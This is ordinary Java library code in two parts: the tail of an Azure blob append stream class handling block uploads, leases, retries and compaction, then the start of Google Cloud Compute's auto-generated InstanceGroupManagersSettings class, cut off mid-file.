*/ private boolean blobExist; /** * When the blob exist, to to prevent concurrent write we take a lease. * Taking a lease is not necessary for new blobs. */ private SelfRenewingLease lease = null; /** * The support for process of compaction is optional. */ private final boolean compactionEnabled; /** * The number of blocks above each block compaction is triggered. */ private static final int DEFAULT_ACTIVATE_COMPACTION_BLOCK_COUNT = 32000; /** * The number of blocks above each block compaction is triggered. */ private int activateCompactionBlockCount = DEFAULT_ACTIVATE_COMPACTION_BLOCK_COUNT; /** * The size of the output buffer. Writes store the data in outBuffer until * either the size is above maxBlockSize or hflush/hsync is called. */ private final AtomicInteger maxBlockSize; /** * The current buffer where writes are stored. */ private ByteBuffer outBuffer; /** * The size of the blob that has been successfully stored in the Azure Blob * service. */ private final AtomicLong committedBlobLength = new AtomicLong(0); /** * Position of last block in the blob. */ private volatile long blobLength = 0; /** * Minutes waiting before the close operation timed out. */ private static final int CLOSE_UPLOAD_DELAY = 10; /** * Keep alive time for the threadpool. */ private static final int THREADPOOL_KEEP_ALIVE = 30; /** * Azure Block Blob used for the stream. */ private final CloudBlockBlobWrapper blob; /** * Azure Storage operation context. */ private final OperationContext opContext; /** * Commands send from client calls to the background thread pool. 
*/ private abstract class UploadCommand { // the blob offset for the command private final long commandBlobOffset; // command completion latch private final CountDownLatch completed = new CountDownLatch(1); UploadCommand(long offset) { this.commandBlobOffset = offset; } long getCommandBlobOffset() { return commandBlobOffset; } void await() throws InterruptedException { completed.await(); } void awaitAsDependent() throws InterruptedException { await(); } void setCompleted() { completed.countDown(); } void execute() throws InterruptedException, IOException {} void dump() {} } /** * The list of recent commands. Before block list is committed, all the block * listed in the list must be uploaded. activeBlockCommands is used for * enumerating the blocks and waiting on the latch until the block is * uploaded. */ private final ConcurrentLinkedQueue<UploadCommand> activeBlockCommands = new ConcurrentLinkedQueue<>(); /** * Variable to track if the stream has been closed. */ private volatile boolean closed = false; /** * First IOException encountered. */ private final AtomicReference<IOException> firstError = new AtomicReference<>(); /** * Flag set when the first error has been thrown. */ private boolean firstErrorThrown = false; /** * Semaphore for serializing block uploads with NativeAzureFileSystem. * * The semaphore starts with number of permits equal to the number of block * upload threads. Each block upload thread needs one permit to start the * upload. The put block list acquires all the permits before the block list * is committed. */ private final Semaphore uploadingSemaphore = new Semaphore( MAX_NUMBER_THREADS_IN_THREAD_POOL, true); /** * Queue storing buffers with the size of the Azure block ready for * reuse. The pool allows reusing the blocks instead of allocating new * blocks. 
After the data is sent to the service, the buffer is returned * back to the queue */ private final ElasticByteBufferPool poolReadyByteBuffers = new ElasticByteBufferPool(); /** * The blob's block list. */ private final List<BlockEntry> blockEntries = new ArrayList<>( DEFAULT_CAPACITY_BLOCK_ENTRIES); private static final int DEFAULT_CAPACITY_BLOCK_ENTRIES = 1024; /** * The uncommitted blob's block list. */ private final ConcurrentLinkedDeque<BlockEntry> uncommittedBlockEntries = new ConcurrentLinkedDeque<>(); /** * Variable to hold the next block id to be used for azure storage blocks. */ private static final int UNSET_BLOCKS_COUNT = -1; private long nextBlockCount = UNSET_BLOCKS_COUNT; /** * Variable to hold the block id prefix to be used for azure storage blocks. */ private String blockIdPrefix = null; /** * Maximum number of threads in block upload thread pool. */ private static final int MAX_NUMBER_THREADS_IN_THREAD_POOL = 4; /** * Number of times block upload needs is retried. */ private static final int MAX_BLOCK_UPLOAD_RETRIES = 3; /** * Wait time between block upload retries in milliseconds. */ private static final int BLOCK_UPLOAD_RETRY_INTERVAL = 1000; /** * Logger. */ private static final Logger LOG = LoggerFactory.getLogger(BlockBlobAppendStream.class); /** * The absolute maximum of blocks for a blob. It includes committed and * temporary blocks. */ private static final int MAX_BLOCK_COUNT = 100000; /** * The upload thread pool executor. */ private ThreadPoolExecutor ioThreadPool; /** * Azure Storage access conditions for the blob. */ private final AccessCondition accessCondition = new AccessCondition(); /** * Atomic integer to provide thread id for thread names for uploader threads. */ private final AtomicInteger threadSequenceNumber; /** * Prefix to be used for thread names for uploader threads. */ private static final String THREAD_ID_PREFIX = "append-blockblob"; /** * BlockBlobAppendStream constructor. 
* * @param blob * Azure Block Blob * @param aKey * blob's name * @param bufferSize * the maximum size of a blob block. * @param compactionEnabled * is the compaction process enabled for this blob * @param opContext * Azure Store operation context for the blob * @throws IOException * if an I/O error occurs. In particular, an IOException may be * thrown if the output stream cannot be used for append operations */ public BlockBlobAppendStream(final CloudBlockBlobWrapper blob, final String aKey, final int bufferSize, final boolean compactionEnabled, final OperationContext opContext) throws IOException { Preconditions.checkArgument(StringUtils.isNotEmpty(aKey)); Preconditions.checkArgument(bufferSize >= 0); this.blob = blob; this.opContext = opContext; this.key = aKey; this.maxBlockSize = new AtomicInteger(bufferSize); this.threadSequenceNumber = new AtomicInteger(0); this.blockIdPrefix = null; this.compactionEnabled = compactionEnabled; this.blobExist = true; this.outBuffer = poolReadyByteBuffers.getBuffer(false, maxBlockSize.get()); try { // download the block list blockEntries.addAll( blob.downloadBlockList( BlockListingFilter.COMMITTED, new BlobRequestOptions(), opContext)); blobLength = blob.getProperties().getLength(); committedBlobLength.set(blobLength); // Acquiring lease on the blob. lease = new SelfRenewingLease(blob, true); accessCondition.setLeaseID(lease.getLeaseID()); } catch (StorageException ex) { if (ex.getErrorCode().equals(StorageErrorCodeStrings.BLOB_NOT_FOUND)) { blobExist = false; } else if (ex.getErrorCode().equals( StorageErrorCodeStrings.LEASE_ALREADY_PRESENT)) { throw new AzureException( "Unable to set Append lease on the Blob: " + ex, ex); } else { LOG.debug( "Encountered storage exception." 
+ " StorageException : {} ErrorCode : {}", ex, ex.getErrorCode()); throw new AzureException(ex); } } setBlocksCountAndBlockIdPrefix(blockEntries); this.ioThreadPool = new ThreadPoolExecutor( MAX_NUMBER_THREADS_IN_THREAD_POOL, MAX_NUMBER_THREADS_IN_THREAD_POOL, THREADPOOL_KEEP_ALIVE, TimeUnit.SECONDS, new LinkedBlockingQueue<>(), new UploaderThreadFactory()); } /** * Set payload size of the stream. * It is intended to be used for unit testing purposes only. */ @VisibleForTesting synchronized void setMaxBlockSize(int size) { maxBlockSize.set(size); // it is for testing only so we can abandon the previously allocated // payload this.outBuffer = ByteBuffer.allocate(maxBlockSize.get()); } /** * Set compaction parameters. * It is intended to be used for unit testing purposes only. */ @VisibleForTesting void setCompactionBlockCount(int activationCount) { activateCompactionBlockCount = activationCount; } /** * Get the list of block entries. It is used for testing purposes only. * @return List of block entries. */ @VisibleForTesting List<BlockEntry> getBlockList() throws StorageException, IOException { return blob.downloadBlockList( BlockListingFilter.COMMITTED, new BlobRequestOptions(), opContext); } /** * Writes the specified byte to this output stream. The general contract for * write is that one byte is written to the output stream. The byte to be * written is the eight low-order bits of the argument b. The 24 high-order * bits of b are ignored. * * @param byteVal * the byteValue to write. * @throws IOException * if an I/O error occurs. In particular, an IOException may be * thrown if the output stream has been closed. */ @Override public void write(final int byteVal) throws IOException { write(new byte[] { (byte) (byteVal & 0xFF) }); } /** * Writes length bytes from the specified byte array starting at offset to * this output stream. * * @param data * the byte array to write. * @param offset * the start offset in the data. 
* @param length * the number of bytes to write. * @throws IOException * if an I/O error occurs. In particular, an IOException may be * thrown if the output stream has been closed. */ @Override public synchronized void write(final byte[] data, int offset, int length) throws IOException { Preconditions.checkArgument(data != null, "null data"); if (offset < 0 || length < 0 || length > data.length - offset) { throw new IndexOutOfBoundsException(); } if (closed) { throw new IOException(FSExceptionMessages.STREAM_IS_CLOSED); } while (outBuffer.remaining() < length) { int remaining = outBuffer.remaining(); outBuffer.put(data, offset, remaining); // upload payload to azure storage addBlockUploadCommand(); offset += remaining; length -= remaining; } outBuffer.put(data, offset, length); } /** * Flushes this output stream and forces any buffered output bytes to be * written out. If any data remains in the payload it is committed to the * service. Data is queued for writing and forced out to the service * before the call returns. */ @Override public void flush() throws IOException { if (closed) { // calling close() after the stream is closed starts with call to flush() return; } addBlockUploadCommand(); if (committedBlobLength.get() < blobLength) { try { // wait until the block list is committed addFlushCommand().await(); } catch (InterruptedException ie) { Thread.currentThread().interrupt(); } } } /** * Force all data in the output stream to be written to Azure storage. * Wait to return until this is complete. */ @Override public void hsync() throws IOException { // when block compaction is disabled, hsync is empty function if (compactionEnabled) { flush(); } } /** * Force all data in the output stream to be written to Azure storage. * Wait to return until this is complete. 
*/ @Override public void hflush() throws IOException { // when block compaction is disabled, hflush is empty function if (compactionEnabled) { flush(); } } /** * The Synchronization capabilities of this stream depend upon the compaction * policy. * @param capability string to query the stream support for. * @return true for hsync and hflush when compaction is enabled. */ @Override public boolean hasCapability(String capability) { if (!compactionEnabled) { return false; } return StoreImplementationUtils.isProbeForSyncable(capability); } /** * Force all data in the output stream to be written to Azure storage. * Wait to return until this is complete. Close the access to the stream and * shutdown the upload thread pool. * If the blob was created, its lease will be released. * Any error encountered caught in threads and stored will be rethrown here * after cleanup. */ @Override public synchronized void close() throws IOException { LOG.debug("close {} ", key); if (closed) { return; } // Upload the last block regardless of compactionEnabled flag flush(); // Initiates an orderly shutdown in which previously submitted tasks are // executed. 
ioThreadPool.shutdown(); try { // wait up to CLOSE_UPLOAD_DELAY minutes to upload all the blocks if (!ioThreadPool.awaitTermination(CLOSE_UPLOAD_DELAY, TimeUnit.MINUTES)) { LOG.error("Time out occurred while close() is waiting for IO request to" + " finish in append" + " for blob : {}", key); NativeAzureFileSystemHelper.logAllLiveStackTraces(); throw new AzureException("Timed out waiting for IO requests to finish"); } } catch(InterruptedException ex) { Thread.currentThread().interrupt(); } // release the lease if (firstError.get() == null && blobExist) { try { lease.free(); } catch (StorageException ex) { LOG.debug("Lease free update blob {} encountered Storage Exception:" + " {} Error Code : {}", key, ex, ex.getErrorCode()); maybeSetFirstError(new AzureException(ex)); } } closed = true; // finally, throw the first exception raised if it has not // been thrown elsewhere. if (firstError.get() != null && !firstErrorThrown) { throw firstError.get(); } } /** * Helper method used to generate the blockIDs. The algorithm used is similar * to the Azure storage SDK. */ private void setBlocksCountAndBlockIdPrefix(List<BlockEntry> blockEntries) { if (nextBlockCount == UNSET_BLOCKS_COUNT && blockIdPrefix == null) { Random sequenceGenerator = new Random(); String blockZeroBlockId = (!blockEntries.isEmpty()) ? 
blockEntries.get(0).getId() : ""; String prefix = UUID.randomUUID().toString() + "-"; String sampleNewerVersionBlockId = generateNewerVersionBlockId(prefix, 0); if (!blockEntries.isEmpty() && blockZeroBlockId.length() < sampleNewerVersionBlockId.length()) { // If blob has already been created with 2.2.0, append subsequent blocks // with older version (2.2.0) blockId compute nextBlockCount, the way it // was done before; and don't use blockIdPrefix this.blockIdPrefix = ""; nextBlockCount = (long) (sequenceGenerator.nextInt(Integer.MAX_VALUE)) + sequenceGenerator.nextInt( Integer.MAX_VALUE - MAX_BLOCK_COUNT); nextBlockCount += blockEntries.size(); } else { // If there are no existing blocks, create the first block with newer // version (4.2.0) blockId. If blob has already been created with 4.2.0, // append subsequent blocks with newer version (4.2.0) blockId this.blockIdPrefix = prefix; nextBlockCount = blockEntries.size(); } } } /** * Helper method that generates the next block id for uploading a block to * azure storage. * @return String representing the block ID generated. * @throws IOException if the stream is in invalid state */ private String generateBlockId() throws IOException { if (nextBlockCount == UNSET_BLOCKS_COUNT || blockIdPrefix == null) { throw new AzureException( "Append Stream in invalid state. nextBlockCount not set correctly"); } return (!blockIdPrefix.isEmpty()) ? generateNewerVersionBlockId(blockIdPrefix, nextBlockCount++) : generateOlderVersionBlockId(nextBlockCount++); } /** * Helper method that generates an older (2.2.0) version blockId. * @return String representing the block ID generated. */ private String generateOlderVersionBlockId(long id) { byte[] blockIdInBytes = new byte[8]; for (int m = 0; m < 8; m++) { blockIdInBytes[7 - m] = (byte) ((id >> (8 * m)) & 0xFF); } return new String( Base64.encodeBase64(blockIdInBytes), StandardCharsets.UTF_8); } /** * Helper method that generates an newer (4.2.0) version blockId. 
* @return String representing the block ID generated. */ private String generateNewerVersionBlockId(String prefix, long id) { String blockIdSuffix = String.format("%06d", id); byte[] blockIdInBytes = (prefix + blockIdSuffix).getBytes(StandardCharsets.UTF_8); return new String(Base64.encodeBase64(blockIdInBytes), StandardCharsets.UTF_8); } /** * This is shared between upload block Runnable and CommitBlockList. The * method captures retry logic * @param blockId block name * @param dataPayload block content */ private void writeBlockRequestInternal(String blockId, ByteBuffer dataPayload, boolean bufferPoolBuffer) { IOException lastLocalException = null; int uploadRetryAttempts = 0; while (uploadRetryAttempts < MAX_BLOCK_UPLOAD_RETRIES) { try { long startTime = System.nanoTime(); blob.uploadBlock(blockId, accessCondition, new ByteArrayInputStream( dataPayload.array()), dataPayload.position(), new BlobRequestOptions(), opContext); LOG.debug("upload block finished for {} ms. block {} ", TimeUnit.NANOSECONDS.toMillis( System.nanoTime() - startTime), blockId); break; } catch(Exception ioe) { LOG.debug("Encountered exception during uploading block for Blob {}" + " Exception : {}", key, ioe); uploadRetryAttempts++; lastLocalException = new AzureException( "Encountered Exception while uploading block: " + ioe, ioe); try { Thread.sleep( BLOCK_UPLOAD_RETRY_INTERVAL * (uploadRetryAttempts + 1)); } catch(InterruptedException ie) { Thread.currentThread().interrupt(); break; } } } if (bufferPoolBuffer) { poolReadyByteBuffers.putBuffer(dataPayload); } if (uploadRetryAttempts == MAX_BLOCK_UPLOAD_RETRIES) { maybeSetFirstError(lastLocalException); } } /** * Set {@link #firstError} to the exception if it is not already set. 
* @param exception exception to save */ private void maybeSetFirstError(IOException exception) { firstError.compareAndSet(null, exception); } /** * Throw the first error caught if it has not been raised already * @throws IOException if one is caught and needs to be thrown. */ private void maybeThrowFirstError() throws IOException { if (firstError.get() != null) { firstErrorThrown = true; throw firstError.get(); } } /** * Write block list. The method captures retry logic */ private void writeBlockListRequestInternal() { IOException lastLocalException = null; int uploadRetryAttempts = 0; while (uploadRetryAttempts < MAX_BLOCK_UPLOAD_RETRIES) { try { long startTime = System.nanoTime(); blob.commitBlockList(blockEntries, accessCondition, new BlobRequestOptions(), opContext); LOG.debug("Upload block list took {} ms for blob {} ", TimeUnit.NANOSECONDS.toMillis( System.nanoTime() - startTime), key); break; } catch(Exception ioe) { LOG.debug("Encountered exception during uploading block for Blob {}" + " Exception : {}", key, ioe); uploadRetryAttempts++; lastLocalException = new AzureException( "Encountered Exception while uploading block: " + ioe, ioe); try { Thread.sleep( BLOCK_UPLOAD_RETRY_INTERVAL * (uploadRetryAttempts + 1)); } catch(InterruptedException ie) { Thread.currentThread().interrupt(); break; } } } if (uploadRetryAttempts == MAX_BLOCK_UPLOAD_RETRIES) { maybeSetFirstError(lastLocalException); } } /** * A ThreadFactory that creates uploader thread with * meaningful names helpful for debugging purposes. */ class UploaderThreadFactory implements ThreadFactory { @Override public Thread newThread(Runnable r) { Thread t = new Thread(r); t.setName(String.format("%s-%d", THREAD_ID_PREFIX, threadSequenceNumber.getAndIncrement())); return t; } } /** * Upload block commands. 
*/ private class UploadBlockCommand extends UploadCommand { // the block content for upload private final ByteBuffer payload; // description of the block private final BlockEntry entry; UploadBlockCommand(String blockId, ByteBuffer payload) { super(blobLength); BlockEntry blockEntry = new BlockEntry(blockId); blockEntry.setSize(payload.position()); blockEntry.setSearchMode(BlockSearchMode.LATEST); this.payload = payload; this.entry = blockEntry; uncommittedBlockEntries.add(blockEntry); } /** * Execute command. */ void execute() throws InterruptedException { uploadingSemaphore.acquire(1); writeBlockRequestInternal(entry.getId(), payload, true); uploadingSemaphore.release(1); } void dump() { LOG.debug("upload block {} size: {} for blob {}", entry.getId(), entry.getSize(), key); } } /** * Upload blob block list commands. */ private class UploadBlockListCommand extends UploadCommand { private BlockEntry lastBlock = null; UploadBlockListCommand() { super(blobLength); if (!uncommittedBlockEntries.isEmpty()) { lastBlock = uncommittedBlockEntries.getLast(); } } void awaitAsDependent() throws InterruptedException { // empty. later commit block does not need to wait previous commit block // lists. } void dump() { LOG.debug("commit block list with {} blocks for blob {}", uncommittedBlockEntries.size(), key); } /** * Execute command. 
*/ public void execute() throws InterruptedException, IOException { if (committedBlobLength.get() >= getCommandBlobOffset()) { LOG.debug("commit already applied for {}", key); return; } if (lastBlock == null) { LOG.debug("nothing to commit for {}", key); return; } LOG.debug("active commands: {} for {}", activeBlockCommands.size(), key); for (UploadCommand activeCommand : activeBlockCommands) { if (activeCommand.getCommandBlobOffset() < getCommandBlobOffset()) { activeCommand.dump(); activeCommand.awaitAsDependent(); } else { break; } } // stop all uploads until the block list is committed uploadingSemaphore.acquire(MAX_NUMBER_THREADS_IN_THREAD_POOL); BlockEntry uncommittedBlock; do { uncommittedBlock = uncommittedBlockEntries.poll(); blockEntries.add(uncommittedBlock); } while (uncommittedBlock != lastBlock); if (blockEntries.size() > activateCompactionBlockCount) { LOG.debug("Block compaction: activated with {} blocks for {}", blockEntries.size(), key); // Block compaction long startCompaction = System.nanoTime(); blockCompaction(); LOG.debug("Block compaction finished for {} ms with {} blocks for {}", TimeUnit.NANOSECONDS.toMillis( System.nanoTime() - startCompaction), blockEntries.size(), key); } writeBlockListRequestInternal(); uploadingSemaphore.release(MAX_NUMBER_THREADS_IN_THREAD_POOL); // remove blocks previous commands for (Iterator<UploadCommand> it = activeBlockCommands.iterator(); it.hasNext();) { UploadCommand activeCommand = it.next(); if (activeCommand.getCommandBlobOffset() <= getCommandBlobOffset()) { it.remove(); } else { break; } } committedBlobLength.set(getCommandBlobOffset()); } /** * Internal output stream with read access to the internal buffer. */ private class ByteArrayOutputStreamInternal extends ByteArrayOutputStream { ByteArrayOutputStreamInternal(int size) { super(size); } byte[] getByteArray() { return buf; } } /** * Block compaction process. 
* * Block compaction is only enabled when the number of blocks exceeds * activateCompactionBlockCount. The algorithm searches for the longest * segment [b..e) where (e-b) > 2 && |b| + |b+1| ... |e-1| < maxBlockSize * such that size(b1) + size(b2) + ... + size(bn) < maximum-block-size. * It then downloads the blocks in the sequence, concatenates the data to * form a single block, uploads this new block, and updates the block * list to replace the sequence of blocks with the new block. */ private void blockCompaction() throws IOException { //current segment [segmentBegin, segmentEnd) and file offset/size of the // current segment int segmentBegin = 0, segmentEnd = 0; long segmentOffsetBegin = 0, segmentOffsetEnd = 0; //longest segment [maxSegmentBegin, maxSegmentEnd) and file offset/size of // the longest segment int maxSegmentBegin = 0, maxSegmentEnd = 0; long maxSegmentOffsetBegin = 0, maxSegmentOffsetEnd = 0; for (BlockEntry block : blockEntries) { segmentEnd++; segmentOffsetEnd += block.getSize(); if (segmentOffsetEnd - segmentOffsetBegin > maxBlockSize.get()) { if (segmentEnd - segmentBegin > 2) { if (maxSegmentEnd - maxSegmentBegin < segmentEnd - segmentBegin) { maxSegmentBegin = segmentBegin; maxSegmentEnd = segmentEnd; maxSegmentOffsetBegin = segmentOffsetBegin; maxSegmentOffsetEnd = segmentOffsetEnd - block.getSize(); } } segmentBegin = segmentEnd - 1; segmentOffsetBegin = segmentOffsetEnd - block.getSize(); } } if (maxSegmentEnd - maxSegmentBegin > 1) { LOG.debug("Block compaction: {} blocks for {}", maxSegmentEnd - maxSegmentBegin, key); // download synchronously all the blocks from the azure storage ByteArrayOutputStreamInternal blockOutputStream = new ByteArrayOutputStreamInternal(maxBlockSize.get()); try { long length = maxSegmentOffsetEnd - maxSegmentOffsetBegin; blob.downloadRange(maxSegmentOffsetBegin, length, blockOutputStream, new BlobRequestOptions(), opContext); } catch(StorageException ex) { LOG.error( "Storage exception encountered during block 
compaction phase" + " : {} Storage Exception : {} Error Code: {}", key, ex, ex.getErrorCode()); throw new AzureException( "Encountered Exception while committing append blocks " + ex, ex); } // upload synchronously new block to the azure storage String blockId = generateBlockId(); ByteBuffer byteBuffer = ByteBuffer.wrap( blockOutputStream.getByteArray()); byteBuffer.position(blockOutputStream.size()); writeBlockRequestInternal(blockId, byteBuffer, false); // replace blocks from the longest segment with new block id blockEntries.subList(maxSegmentBegin + 1, maxSegmentEnd - 1).clear(); BlockEntry newBlock = blockEntries.get(maxSegmentBegin); newBlock.setId(blockId); newBlock.setSearchMode(BlockSearchMode.LATEST); newBlock.setSize(maxSegmentOffsetEnd - maxSegmentOffsetBegin); } } } /** * Prepare block upload command and queue the command in thread pool executor. */ private synchronized void addBlockUploadCommand() throws IOException { maybeThrowFirstError(); if (blobExist && lease.isFreed()) { throw new AzureException(String.format( "Attempting to upload a block on blob : %s " + " that does not have lease on the Blob. Failing upload", key)); } int blockSize = outBuffer.position(); if (blockSize > 0) { UploadCommand command = new UploadBlockCommand(generateBlockId(), outBuffer); activeBlockCommands.add(command); blobLength += blockSize; outBuffer = poolReadyByteBuffers.getBuffer(false, maxBlockSize.get()); ioThreadPool.execute(new WriteRequest(command)); } } /** * Prepare block list commit command and queue the command in thread pool * executor. */ private synchronized UploadCommand addFlushCommand() throws IOException { maybeThrowFirstError(); if (blobExist && lease.isFreed()) { throw new AzureException( String.format("Attempting to upload block list on blob : %s" + " that does not have lease on the Blob. 
Failing upload", key)); } UploadCommand command = new UploadBlockListCommand(); activeBlockCommands.add(command); ioThreadPool.execute(new WriteRequest(command)); return command; } /** * Runnable instance that uploads the block of data to azure storage. */ private class WriteRequest implements Runnable { private final UploadCommand command; WriteRequest(UploadCommand command) { this.command = command; } @Override public void run() { try { command.dump(); long startTime = System.nanoTime(); command.execute(); command.setCompleted(); LOG.debug("command finished for {} ms", TimeUnit.NANOSECONDS.toMillis( System.nanoTime() - startTime)); } catch (InterruptedException ie) { Thread.currentThread().interrupt(); } catch (Exception ex) { LOG.debug( "Encountered exception during execution of command for Blob :" + " {} Exception : {}", key, ex); firstError.compareAndSet(null, new AzureException(ex)); } } } }
googleapis/google-cloud-java
36,200
java-compute/google-cloud-compute/src/main/java/com/google/cloud/compute/v1/InstanceGroupManagersSettings.java
/*
 * Copyright 2025 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package com.google.cloud.compute.v1;

import static com.google.cloud.compute.v1.InstanceGroupManagersClient.AggregatedListPagedResponse;
import static com.google.cloud.compute.v1.InstanceGroupManagersClient.ListErrorsPagedResponse;
import static com.google.cloud.compute.v1.InstanceGroupManagersClient.ListManagedInstancesPagedResponse;
import static com.google.cloud.compute.v1.InstanceGroupManagersClient.ListPagedResponse;
import static com.google.cloud.compute.v1.InstanceGroupManagersClient.ListPerInstanceConfigsPagedResponse;

import com.google.api.core.ApiFunction;
import com.google.api.gax.core.GoogleCredentialsProvider;
import com.google.api.gax.core.InstantiatingExecutorProvider;
import com.google.api.gax.httpjson.InstantiatingHttpJsonChannelProvider;
import com.google.api.gax.rpc.ApiClientHeaderProvider;
import com.google.api.gax.rpc.ClientContext;
import com.google.api.gax.rpc.ClientSettings;
import com.google.api.gax.rpc.OperationCallSettings;
import com.google.api.gax.rpc.PagedCallSettings;
import com.google.api.gax.rpc.TransportChannelProvider;
import com.google.api.gax.rpc.UnaryCallSettings;
import com.google.cloud.compute.v1.stub.InstanceGroupManagersStubSettings;
import java.io.IOException;
import java.util.List;
import javax.annotation.Generated;

// AUTO-GENERATED DOCUMENTATION AND CLASS.
/**
 * Settings class to configure an instance of {@link InstanceGroupManagersClient}.
 *
 * <p>The default instance has everything set to sensible defaults:
 *
 * <ul>
 *   <li>The default service address (compute.googleapis.com) and default port (443) are used.
 *   <li>Credentials are acquired automatically through Application Default Credentials.
 *   <li>Retries are configured for idempotent methods but not for non-idempotent methods.
 * </ul>
 *
 * <p>The builder of this class is recursive, so contained classes are themselves builders. When
 * build() is called, the tree of builders is called to create the complete settings object.
 *
 * <p>For example, to set the
 * [RetrySettings](https://cloud.google.com/java/docs/reference/gax/latest/com.google.api.gax.retrying.RetrySettings)
 * of get:
 *
 * <pre>{@code
 * // This snippet has been automatically generated and should be regarded as a code template only.
 * // It will require modifications to work:
 * // - It may require correct/in-range values for request initialization.
 * // - It may require specifying regional endpoints when creating the service client as shown in
 * // https://cloud.google.com/java/docs/setup#configure_endpoints_for_the_client_library
 * InstanceGroupManagersSettings.Builder instanceGroupManagersSettingsBuilder =
 *     InstanceGroupManagersSettings.newBuilder();
 * instanceGroupManagersSettingsBuilder
 *     .getSettings()
 *     .setRetrySettings(
 *         instanceGroupManagersSettingsBuilder
 *             .getSettings()
 *             .getRetrySettings()
 *             .toBuilder()
 *             .setInitialRetryDelayDuration(Duration.ofSeconds(1))
 *             .setInitialRpcTimeoutDuration(Duration.ofSeconds(5))
 *             .setMaxAttempts(5)
 *             .setMaxRetryDelayDuration(Duration.ofSeconds(30))
 *             .setMaxRpcTimeoutDuration(Duration.ofSeconds(60))
 *             .setRetryDelayMultiplier(1.3)
 *             .setRpcTimeoutMultiplier(1.5)
 *             .setTotalTimeoutDuration(Duration.ofSeconds(300))
 *             .build());
 * InstanceGroupManagersSettings instanceGroupManagersSettings =
 *     instanceGroupManagersSettingsBuilder.build();
 * }</pre>
 *
 * Please refer to the [Client Side Retry
 * Guide](https://github.com/googleapis/google-cloud-java/blob/main/docs/client_retries.md) for
 * additional support in setting retries.
 *
 * <p>To configure the RetrySettings of a Long Running Operation method, create an
 * OperationTimedPollAlgorithm object and update the RPC's polling algorithm. For example, to
 * configure the RetrySettings for abandonInstances:
 *
 * <pre>{@code
 * // This snippet has been automatically generated and should be regarded as a code template only.
 * // It will require modifications to work:
 * // - It may require correct/in-range values for request initialization.
 * // - It may require specifying regional endpoints when creating the service client as shown in
 * // https://cloud.google.com/java/docs/setup#configure_endpoints_for_the_client_library
 * InstanceGroupManagersSettings.Builder instanceGroupManagersSettingsBuilder =
 *     InstanceGroupManagersSettings.newBuilder();
 * TimedRetryAlgorithm timedRetryAlgorithm =
 *     OperationTimedPollAlgorithm.create(
 *         RetrySettings.newBuilder()
 *             .setInitialRetryDelayDuration(Duration.ofMillis(500))
 *             .setRetryDelayMultiplier(1.5)
 *             .setMaxRetryDelayDuration(Duration.ofMillis(5000))
 *             .setTotalTimeoutDuration(Duration.ofHours(24))
 *             .build());
 * instanceGroupManagersSettingsBuilder
 *     .abandonInstancesOperationSettings()
 *     .setPollingAlgorithm(timedRetryAlgorithm)
 *     .build();
 * }</pre>
 */
@Generated("by gapic-generator-java")
public class InstanceGroupManagersSettings extends ClientSettings<InstanceGroupManagersSettings> {

  // NOTE: This class is generated code. Every accessor below is a thin delegate to the
  // transport-level InstanceGroupManagersStubSettings held by the ClientSettings superclass;
  // the cast is safe because instances are only ever constructed from that stub settings type.

  /** Returns the object with the settings used for calls to abandonInstances. */
  public UnaryCallSettings<AbandonInstancesInstanceGroupManagerRequest, Operation>
      abandonInstancesSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).abandonInstancesSettings();
  }

  /** Returns the object with the settings used for calls to abandonInstances. */
  public OperationCallSettings<AbandonInstancesInstanceGroupManagerRequest, Operation, Operation>
      abandonInstancesOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .abandonInstancesOperationSettings();
  }

  /** Returns the object with the settings used for calls to aggregatedList. */
  public PagedCallSettings<
          AggregatedListInstanceGroupManagersRequest,
          InstanceGroupManagerAggregatedList,
          AggregatedListPagedResponse>
      aggregatedListSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).aggregatedListSettings();
  }

  /** Returns the object with the settings used for calls to applyUpdatesToInstances. */
  public UnaryCallSettings<ApplyUpdatesToInstancesInstanceGroupManagerRequest, Operation>
      applyUpdatesToInstancesSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .applyUpdatesToInstancesSettings();
  }

  /** Returns the object with the settings used for calls to applyUpdatesToInstances. */
  public OperationCallSettings<
          ApplyUpdatesToInstancesInstanceGroupManagerRequest, Operation, Operation>
      applyUpdatesToInstancesOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .applyUpdatesToInstancesOperationSettings();
  }

  /** Returns the object with the settings used for calls to createInstances. */
  public UnaryCallSettings<CreateInstancesInstanceGroupManagerRequest, Operation>
      createInstancesSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).createInstancesSettings();
  }

  /** Returns the object with the settings used for calls to createInstances. */
  public OperationCallSettings<CreateInstancesInstanceGroupManagerRequest, Operation, Operation>
      createInstancesOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .createInstancesOperationSettings();
  }

  /** Returns the object with the settings used for calls to delete. */
  public UnaryCallSettings<DeleteInstanceGroupManagerRequest, Operation> deleteSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).deleteSettings();
  }

  /** Returns the object with the settings used for calls to delete. */
  public OperationCallSettings<DeleteInstanceGroupManagerRequest, Operation, Operation>
      deleteOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).deleteOperationSettings();
  }

  /** Returns the object with the settings used for calls to deleteInstances. */
  public UnaryCallSettings<DeleteInstancesInstanceGroupManagerRequest, Operation>
      deleteInstancesSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings()).deleteInstancesSettings();
  }

  /** Returns the object with the settings used for calls to deleteInstances. */
  public OperationCallSettings<DeleteInstancesInstanceGroupManagerRequest, Operation, Operation>
      deleteInstancesOperationSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .deleteInstancesOperationSettings();
  }

  /** Returns the object with the settings used for calls to deletePerInstanceConfigs. */
  public UnaryCallSettings<DeletePerInstanceConfigsInstanceGroupManagerRequest, Operation>
      deletePerInstanceConfigsSettings() {
    return ((InstanceGroupManagersStubSettings) getStubSettings())
        .deletePerInstanceConfigsSettings();
  }

  /** Returns the object with the settings used for calls to deletePerInstanceConfigs. */
